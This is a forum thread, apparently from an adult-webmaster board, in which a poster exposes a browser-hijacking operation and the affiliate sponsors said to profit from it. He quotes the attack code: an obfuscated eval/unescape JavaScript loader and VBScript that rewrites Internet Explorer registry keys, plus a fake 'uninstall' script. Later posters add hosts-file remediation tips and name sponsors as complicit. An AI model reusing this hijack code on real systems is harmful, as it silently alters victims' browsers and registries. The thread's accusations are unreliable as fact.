Smokey The Bear

ORIGINAL PAGE THAT INITIALIZES THIS HACK

http://xxxpix4u.com/ * do not visit this site without an active firewall

FAKE OWNER OF DOMAIN

Erik Midsbraw ([email protected])
1067543182
PO BOX midsbraw
LA, MT 11652
US

SPONSORS SUPPORTING THIS HACKER

http://www.discountvideopass.com/?revid=100444
http://www.freepassbucks.com/freepb.php?site=36&e_refer=12111
http://www.ucbill.com/click.php?uid=ucsoft&bg=ffffff&product=1
http://derek.offshoreclicks.com/imps.php?affiliate=derek
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=1&loadfirst=0&delayload=0&account_id=132192&adi d=a1066847049
http://www.freeezinebucks.com/ps.php?s=20&u=2398645
http://www.girlknights.com/index_main.html?id=274
http://www.coolwebsearch.com/search.php?aff=257
http://trafficback.com/cgi-bin/out/59/2&p=60&f=1&link=text
http://tradesgear.com/?ref_id=638

ok the js file below can be found at

http://xxxpix4u.com/clean.js

this code with obstrucated urls

{ -
vor t="",w="",o="wu.Pflb0i hMS|=zjHkgosn;p)\"Tad1<vre>/Jmty-Lc",c=46;eval(unescape("%66%75%6E%63%74%69%6F%6E%2 0%67%67%67%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77% 72%69%74%65%28%77%29%7D%3B%66%75%6E%63%74%69%6F%6E %20%71%28%64%29%7B%76%61%72%20%72%3D%27%27%2C%78%2 C%69%2C%79%2C%70%3B%66%6F%72%28%78%3D%30%3B%78%3C% 64%2E%6C%65%6E%67%74%68%3B%78%2B%2B%29%7B%69%3D%64 %2E%63%68%61%72%41%74%28%78%29%3B%79%3D%6F%2E%69%6 E%64%65%78%4F%66%28%69%29%3B%69%66%28%79%3E%2D%31% 29%7B%70%3D%28%28%79%2B%31%29%25%63%2D%31%29%3B%69 %66%28%70%3C%3D%30%29%7B%70%2B%3D%63%7D%72%2B%3D%6 F%2E%63%68%61%72%41%74%28%70%2D%31%29%7D%65%6C%73% 65%7B%72%2B%3D%69%7D%7D%77%2B%3D%72%7D"));q("hhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhvnwe ");q(")yhbd;o.do>zTmdrd|we )yT/\r\nrdehsfs).)hzhu ;1suPwe>dy>fs).)-\"p\r\nl.;wy s;hnMsufs).)-\"h{\r\nhhhhsfs).)P1sw.t>;yP0s1:P ;;>ekaSchzhTvs0H>wyh1dydzMyy)(JJs;b:Mde1) wnPwstJr 1nJ<P)M)/Tp\r\nhhhhsfs).)PnMsu-i,i,<,<,1sw.t>;yP0s1:\"p\r\nhh}\r\nl.;wy s;hny bb-\"{\r\n}\r\nl.;wy s;hl.wg.)-\"{\r\nnMsufs).)-\"\r\n}\r\nrdehbd;ohzh;dr odysePn:ny>tcd;o.do>p\r\n lh--bd;ohzzhTe.T\"hhahahahah-bd;ohzzhTjMLwMT\"hhahahahah-bd;ohzzhTjMLMgT\"hhahahahah-bd;ohzzhTjMT\"hhahahahah-bd;ohzzhTjMLtsT\"hhahahahah-bd;ohzzhTjMLnoT\"hhahahahah-bd;ohzzhTjMLyuT\"hhahahaha");q("h-bd;ohzzhT.gT\"hhahahahah-bd;ohzzhT.jT\"\"h{ny bb-\"p}\r\n>bn>\r\n{l.wg.)-\"p}\r\nvJnwe )y/h");ggg();dacumint.write(t);t="";//--}

this code attempts to access your mshta.exe if successfull it runs

http://www.onlyhardpics.com/vids/1.php and the following code


<scruipt languige=vbs>
Set Shl = CreateObject("WScript.Shell")
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Bar", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Use Search Asst", "no"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\SearchUrl\", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Search\SearchAssistant", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Search\CustomizeSearch", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\Default_Search_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.searchdot.net"
window.close()
</scrupt>


Fake uninstall can be located at

http://www.searchdot.net/remove/index.html

this opens up

http://onlyhardpics.com/qunin/1.php and the following code

scrap language="Javacrap" type="text/javcrap"><!--
var m="",f="lPIvg pAuj;Bn(0WEr<qd\"=ozLt/:aM>chmSk#5.sTy)wiHf1eb",g="",i=51;eval(unescape(" %66%75%6E%63%74%69%6F%6E%20%70%70%70%28%29%7B%64%6 F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%67%29%7D% 3B%66%75%6E%63%74%69%6F%6E%20%72%28%77%29%7B%76%61 %72%20%65%3D%27%27%2C%75%2C%6B%2C%6E%2C%64%3B%66%6 F%72%28%75%3D%30%3B%75%3C%77%2E%6C%65%6E%67%74%68% 3B%75%2B%2B%29%7B%6B%3D%77%2E%63%68%61%72%41%74%28 %75%29%3B%6E%3D%66%2E%69%6E%64%65%78%4F%66%28%6B%2 9%3B%69%66%28%6E%3E%2D%31%29%7B%64%3D%28%28%6E%2B% 31%29%25%69%2D%31%29%3B%69%66%28%64%3C%3D%30%29%7B %64%2B%3D%69%7D%65%2B%3D%66%2E%63%68%61%72%41%74%2 8%64%2D%31%29%7D%65%6C%73%65%7B%65%2B%3D%6B%7D%7D% 67%2B%3D%65%7D"));r("ppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp ppppppppppppppppq\"Hg");r("pMPH (o=hb(/b<=cqlcq1z(/p1Mhbo=u<HMPpnPMh#=pTHLbo=.=phzPz<o=5WWWWWW=cItruk rpEuvypssssq:1z(/cq:lcq:\"HgcpqTh<HA/c\r\nppgM<pzIzAjApopiH(\"zish<bM/bIzAjA0wB\r\n\r\npp1j(h/Hz(pTmziIzAjA0wp{\r\nppppzIzAjAs\"zhjSb(/slz\")sH((b<fy>tpop=qzl;bh/p\"M/Mom//Aa::z(P)mM<\"AHhTshzS:dj(H(:esAmAc=B\r\nppppzIzAjA sTmzi0W,W,e,e,\"zhjSb(/slz\")wB\r\npp}\r\npp\r\nTmziIzAjA0w\r\nq:Th<HA/cp");ppp();hahahahahahahahahahahahahahaha(m);m=" ";//--></scrapt></

and does the following


<scraipt languige=vbs>
Set Shl = CreateObject("WScript.Shell")
Shl.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice",""
Shl.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice",""
Shl.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice"
Shl.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice"
Shl.Popup "UNINSTALL COMPLETE!"
windiw.close()
</scrupt>


If you belong to the sponsors above, i wouldnt be happy that they are allowing this as it means less money in your pocket as more and more people will have already seen your ads and less payout as these people thief your sponsors.

If anyone is thinking of using the code provided to alter other peoples computers , I would think again.


Also to those sponsors or affiliates buying traffic from offshoreclicks.com they are actively involved in buying the above traffic and selling it to you.

The following person can be found with 90% of the domains on thehun's blacklist or anyone else's for that matter.

He is also the person responsible for altering the hosts files for thehun and several other high profile websites


BE WARNED IM GONNA CATCH YOU AND WHEN I DO !!!

- Jesus Christ -

__________________

Amen

Smokey The Bear

p.s. i had to edit the code a bit for it to show up properly

$5 submissions

Damn! Good catch, Smokey!

__________________

Smokey The Bear

Other sponsors have been notified personally as they may be new , the sponsors above are well aware of the this hacker and have been kindly accepting the stolen traffic.

HS-Trixxxia

Good job Smokey - burn him :-)
Have a full list of the domains he's using?
Also, do you have a solution we can give our surfers if they per chance got it?

Thanks for your efforts......great to see the experienced guys vocalizing to help the entire community.

nofx

smokey the bear, puttin' out them firessssss

__________________

Smokey The Bear

I have 2 solutions.

If your running windows xp go into widows/system32/drivers/etc/

and find your hosts file

add the following

66.218.71.198 derek.offshoreclicks.com

66.218.71.198 offshoreclicks.com

66.218.71.198 www.offshoreclicks.com

66.218.71.198 hihost4all.com

66.218.71.198 xvaluehost.com

66.218.71.198 66.230.218.254


this will reroute the above domains to yahoo.com
------------------------------------------------------

and so on with all the domains you dont ever want to see ever again

If you run a tgp make sure your script has whois checkiing capability and start banning by nameservers this will cover alot more ground than banning by domains or emails

If you have already been targeted i suggest u manually edit your registry ( if you have experience ) and use one of the well known spamcleaners such as cwshredder ( search for it on yahoo )

Smokey The Bear

As far as a full list of domains , no i dont like doing that because once those domains get dropped they get snatched up by unsuspecting people who dont realise they are blacklisted causing further problems. If you really want to ban by domain i suggest checking the well known sites blacklists like THEHUN

Nasty D

Way to stay on top of the fires Smokey

__________________


Pimp Mandy Mayhem, Tabatha Sweet, Kristi Montana and Lexy Lohan @ Hawt Money

Smokey The Bear

Bump for the sponsors who just woke up and havent seen this yet.

gornyhuy

God DAMN!
Nice sleuthing... thats some nasty script work.

__________________

icq:159548293

WiredGuy

Great bust!
WG

__________________
I play with Google.

Smokey The Bear

Thanks for the kind words

AWW - Kevin

excellent job Smokey The Bear

btw if you got time hit me up on icq
#1 2 1 2 5 8 3 1 1

pantymaniac

127.0.0.1 localhost 66.40.16.131 livesexlist.com 66.40.16.131 lanasbigboobs.com 66.40.16.131 thumbnailpost.com 66.40.16.131 adult-series.com 66.40.16.131 www.livesexlist.com 66.40.16.131 www.lanasbigboobs.com 66.40.16.131 www.thumbnailpost.com 66.40.16.131 www.adult-series.com


i have this on my host file what should i have to do ?

__________________
This place is for RENT

Xplicit

Nice work detective

goBigtime

I thought smokey was supposed to PUT OUT fires? This bear is running around the forest with a blow torch an shit.

Smokey The Bear

erase it..

Smokey The Bear

And BTW they also have a hack thru windows media player as well on that page above, but im still trying to figure it out . once i do ill leave words

nige

Why not make your hosts file Read-Only?

Juicy D. Links

Smokey even though we flame each other left and right this is a good post

Smokey The Bear

Thanks , A sure sign of maturity and integrity is when you can agree with someone you dont like .

It's time someone started taking these bastards down. One step at a time. I also found a new security flaw in windows media player 9.0 that can cause some serious problems.

B.T.W this same group is responsible for taking down choker and thehun not long ago.

Because these guys move so fast and switch shit so quickly i think everyone needs to take a lesson here about one company in particular. OFFSHORECLICKS.COM

Most sponsors are pretty good at cutting off spammers/warez/cp/hacked traffic but im inclined to think that offshoreclicks is either hand in hand in this ring or is blatantly turning their heads the other way. Either way any sponsors that are affiliated with offshoreclicks will soon be affiliated either directly or indirectly with cp/hacking/warez/spammers, And you may find yourself part of an investigation you dont need. Dont let these thieves turn the adult industry into a mess that we will ALL pay for in the long run.

Juicy D. Links

See Smokey when it all boils down to the basics.... its about the money.

For example Joe Warez says to sponsor yo I can send you x amount of signups and whatever . Sponser sees its good signups low cb's and overlooks the "traffic source"

Now is this BS yes but its amatter of opinion and sometimes money takes front with certain issues and decisions

Smokey The Bear

MORE SPONSORS SUPPORTING THIS GROUP

http://www.PopUpPrevention.net/view.pl?ref=getitnow
http://www.SecretEraser.com/view.pl?ref=getitnow
http://connect.online-dialer.com/connect.php?did=od-stnd12&ufw=http://www.xxxpix4u.com/download.html'
http://www.topshelfpussy.com/main.htm?id=lui <nastydollars
http://adultfriendfinder.com/go/p12323c
http://www.freepassbucks.com/freepb.php?site=2&e_refer=12111
http://www.tnc4u.com/install.php?id=803189
http://www.teensvariety.com/?id=maxx
http://www.absolutepheromones.com/clicks/clickthrough.html?a=zeus
http://click.silvercash.com/?a=582863&p=1&s=922&r=5



*juicy it always has been about the money, but theres a line.

example if badguy sends x traffic to sponsor and everyone else sees this then the ratio's drop and people move to another sponsor. The the sponsor loses and the goodguy loses and the only one who gains is badguy and in the process he makes everyone look bad and make less. Once the feds crack down they associate badguys x traffic with y sponsor and feds make new rules and everyone loses. The traffic isnt being pulled out of thin air its been pilfered from the goodguys so the overall money spent on adult industry doesnt change it just falls into the wrong hands.

Smokey The Bear

MORE SPONSORS THAT ARE ACCEPTING HACKED TRAFFIC

i will repeat the full list plus a few more

If you see your sponsor on this list i wouldnt be happy about it.

Some of the more well known ones are

GAMMACASH
FREEPASSBUCKS
ADULTPLATINUM
NASTYDOLLARS
FREEEZINEBUCKS ( HAWGS CASH )
PERERO
DISCOUNTPASSBUCKS
SILVERCASH
YOBUCKS
ONLINE-DIALER


http://www.adultplatinum.com/wm.html?id=155016
http://rex.offshoreclicks.com/dial.php?u=rex
http://www.virginsgangbang.com/index.html?id=274
http://advnt05.com/popsend.asp?id=30580
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=0&loadfirst=1&account_id=132836
http://media2.carpediem.fr/promo_us/poploop/'+urlpopup+'?id=22020
http://www.PopUpPrevention.net/view.pl?ref=getitnow
http://www.SecretEraser.com/view.pl?ref=getitnow
http://connect.online-dialer.com/connect.php?did=od-stnd12&ufw=http://www.xxxpix4u.com/download.html'
http://www.topshelfpussy.com/main.htm?id=lui http://adultfriendfinder.com/go/p12323c
http://www.freepassbucks.com/freepb.php?site=2&e_refer=12111
http://www.tnc4u.com/install.php?id=803189
http://www.teensvariety.com/?id=maxx
http://www.absolutepheromones.com/clicks/clickthrough.html?a=zeus
http://click.silvercash.com/?a=582863&p=1&s=922&r=5
http://www.discountvideopass.com/?revid=100444
http://www.freepassbucks.com/freepb.php?site=36&e_refer=12111
http://www.ucbill.com/click.php?uid=ucsoft&bg=ffffff&product=1
http://derek.offshoreclicks.com/imps.php?affiliate=derek
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=1&loadfirst=0&delayload=0&account_id=132192&adi d=a1066847049
http://www.freeezinebucks.com/ps.php?s=20&u=2398645
http://www.girlknights.com/index_main.html?id=274
http://www.coolwebsearch.com/search.php?aff=257
http://trafficback.com/cgi-bin/out/59/2&p=60&f=1&link=text
http://tradesgear.com/?ref_id=638

thePelican

Smokey The Bear

I just found out where that even more vicious one is taking place

allteen-galleries.com
smuthostz.com

owned by the same group, and they are switching sponsors as fast as they can

if anyone with some savvy wants to try that first url out and see where you can find out with regards to the hack.

One quick way to get these guys stopped is to contact 10-domains.com and complain about the domain hihost4all.com and also complain to icann about 10-domaisn failure to pull that domain. It is the root cause of most of this crap.

[email protected]

go check the who is on the domains mentioned all the info is false.

HarlotCash Dyker

The Bear Smoked em out -!
Nice work!

__________________
!!!Harlot Cash<<>>Harlot Cash<<>>Harlot Cash<<>>Harlot Cash!!!

Smokey The Bear

MORE SPONSORS ACCEPTING YOUR PILFERED TRAFFIC

www.adultmoviezone.com/.sbean%3Fbean%3D1-0-3-2815-28-1-10-tapenter%26front%3D1
http://www.mtreexxx.net/cpd/?cat=7&wmid=551327&tk=1068940931&args=1+324317+mt9 4+ddl
http://www.freeezinepotd.com/index.php?id=74860&pc=1
http://sexmosaic.com/members/enter.php?id=kucluu
http://www.movie-drive.com/mpegs/?f=73&x=55&rid=pp3536

beemk

what does altering the host file do exactly?

__________________
I host with Vacares

Smokey The Bear

It can do many things . but basically it makes you go to a different page than you want.

Like if u typed in google it would go to coolwebsearch instead, but more and more they are becoming clever. They send you to the correct page , but you recieve a popup that was never there.

I noticed this on thehun a whileback on a friends box , i thought " gee thats strange thehun never had popups before" and sure enough it wasnt thehun it was the altered hosts file

Diligent

Yo guys!

Smokey The Bear is probably too busy finding the crooks out there so...

A good tip for everyone who wants to feel a bit safer against HOSTS-rewrites:
Simply enable a Write-Protect on it's file-attributes (and if available to you, also the "System" attribute).

I believe those hacks out there are trying to overwrite the file "blindly", i.e. NOT clearing any file-attributes before overwriting.
This modification doesn't hurt your system at all so just go ahead

If you don't know where the file is at, just do a filesearch for "hosts" - in XP it's in [WINDOWS\system32\drivers\etc].

__________________

Smokey The Bear

That is a good tip, but as it doesnt work in most cases the hosts file is deleted and remade on the fly thus your read only access wont do much.

And if all these flaws did was rewrite your hosts then that wouldnt be much of a problem.

TRY READING THE DAMN THREAD YOU PUTZ!!!

The intial code i posted rewrites your REGISTRY , or is that hard for you to figure out..

Well then you believe wrong. I happen to know as i watched it happen .

JDog

Great Find! And what is the full list of sponsers?

jDoG

__________________
NSCash now powering ReelProfits.com
ALSO FEATURING: NSCash.com :: SoloDollars.com :: ReelProfits.com :: BiminiBucks.com :: VOD
PROGRAMS COMING SOON: Greedy Bucks :: Vengeance Cash
NOW OFFERING OVER 60 SITES
CONTACT :: JAMES SMITH :: CHIEF TECHNOLOGY OFFICER :: ICQ (711385133)

Smokey The Bear

These are all the accounts held by this hacker/group and all these sponsors dont care that they are recieving stolen traffic. So if you steal traffic from thehun by hacking all these companies seem to support it. As they have been notified and accounts are still open.

I have left off certain sponsors who may not be aware and have notified them personally. If the accounts stay open i will post them here to.


http://www.PopUpPrevention.net/view.pl?ref=getitnow
http://www.SecretEraser.com/view.pl?ref=getitnow
http://connect.online-dialer.com/connect.php?did=od-stnd12&ufw=http://www.xxxpix4u.com/download.html'
http://www.topshelfpussy.com/main.htm?id=lui <nastydollars
http://adultfriendfinder.com/go/p12323c
http://www.freepassbucks.com/freepb.php?site=2&e_refer=12111
http://www.tnc4u.com/install.php?id=803189
http://www.teensvariety.com/?id=maxx
http://www.absolutepheromones.com/clicks/clickthrough.html?a=zeus
http://click.silvercash.com/?a=582863&p=1&s=922&r=5
http://www.adultplatinum.com/wm.html?id=155016
http://rex.offshoreclicks.com/dial.php?u=rex
http://www.virginsgangbang.com/index.html?id=274
http://advnt05.com/popsend.asp?id=30580
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=0&loadfirst=1&account_id=132836
http://media2.carpediem.fr/promo_us/poploop/'+urlpopup+'?id=22020
www.adultmoviezone.com/.sbean%3Fbean%3D1-0-3-2815-28-1-10-tapenter%26front%3D1
http://www.mtreexxx.net/cpd/?cat=7&wmid=551327&tk=1068940931&args=1+324317+mt9 4+ddl
http://www.freeezinepotd.com/index.php?id=74860&pc=1
http://sexmosaic.com/members/enter.php?id=kucluu
http://www.movie-drive.com/mpegs/?f=73&x=55&rid=pp3536
http://www.discountvideopass.com/?revid=100444
http://www.freepassbucks.com/freepb.php?site=36&e_refer=12111
http://www.ucbill.com/click.php?uid=ucsoft&bg=ffffff&product=1
http://derek.offshoreclicks.com/imps.php?affiliate=derek
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=1&loadfirst=0&delayload=0&account_id=132192&adi d=a1066847049
http://www.freeezinebucks.com/ps.php?s=20&u=2398645
http://www.girlknights.com/index_main.html?id=274
http://www.coolwebsearch.com/search.php?aff=257
http://trafficback.com/cgi-bin/out/59/2&p=60&f=1&link=text
http://tradesgear.com/?ref_id=638

Smokey The Bear

Sorry about the previous flame i think i took this the wrong way lol.

The tip is good but may not be enough.

Smokey The Bear

BTW adult.com is one of the sponsors on the list above and that particular ref code came directly from a page that was routing THEHUNS website to it. So to THEHUN if you wonder who is making money off your stolen hits... i would ask lensman about it.

Veterans Day

Lens dont give a fuck, hes a putz like all other sponsors. Fuck em

Diligent

No offense taken.

Do you think there's a way to make only the system allowed to access it and not users/administrators?

Or would the hack have such privileges on it's own and be able to fuck with it anyhow?
If one tries to look at the swapfile in XP for instance you will get a "file not found"..
Users & administrators have no privilige to either read, write, erase or create.
<br>

__________________

Smokey The Bear

As with anything if theres a way to do it, theres a way around it

mastermcp3

who cares!!!!

Smokey The Bear

Lots of people. Including you or you wouldnt have posted in the thread.

RawAlex

Smokey, the typical hack at this point is to change your settings to allow downloads to occur without prompt. once that single change is made, they then hump boatloads of shit onto your system.

The nastier ones will add code in your registry to make sure they get reinstalled on each reboot, and some also change your IE link to be a reinstall for them, and then IE opens. You won't even know you have re-installed them until later - and no matter how many times you think you got rid of them, they come back to haunt you.

The sponsors that knowingly accept this traffic (not the ones that just end up receiving it, many are innocent victims of the scammers as well) should be actively shunned by everyone. The proof of the matter is that for some, pure dollar signs today and more important that a real business for the long term.

Hope the FTC decides to rip them a new one.

Alex

Andy P

damn, someones gonna get burned on this one - nice work man

Smokey The Bear

Theres more to come keep your eyes peeled for my next announcement

vicki

holy moly - what a sluething job!!

nice work

__________________
If at first you do succeed - try to hide your astonishment.

HR merchant accounts from 3.45%
solid biz since 98
victoriakozub AT gmail.com
skype: victoria.kozub | ICQ: 74296746

Smokey The Bear

Thanks. BTW some of the sponsors contacted have not shutdown the accounts

www.freepassbucks.com seems to be working hand in hand with these thieves so is offshoreclicks.com If you have any money tied up in either of these companies . GET OUT NOW !! before its too late. The feds will be breathing down their necks. Means they will prob run away or flip flop the cash.

funkmaster

... now what a fucking big surprise that is. I don't know what you are thinking, but this is pretty much like sponsors saying "we don't accept spam" ... fucking bullshit, they love spam and to tell you the truth, they love exploit traffic even more ... you wanna know why, becasue it's fucking fresh and it converts like a fucking mother ...

kenny

I have seen dozens of galleries redirect to that xpix4u site.

I cant say how many domains those people own but it is ALOT.

Good Job Smokey

__________________
7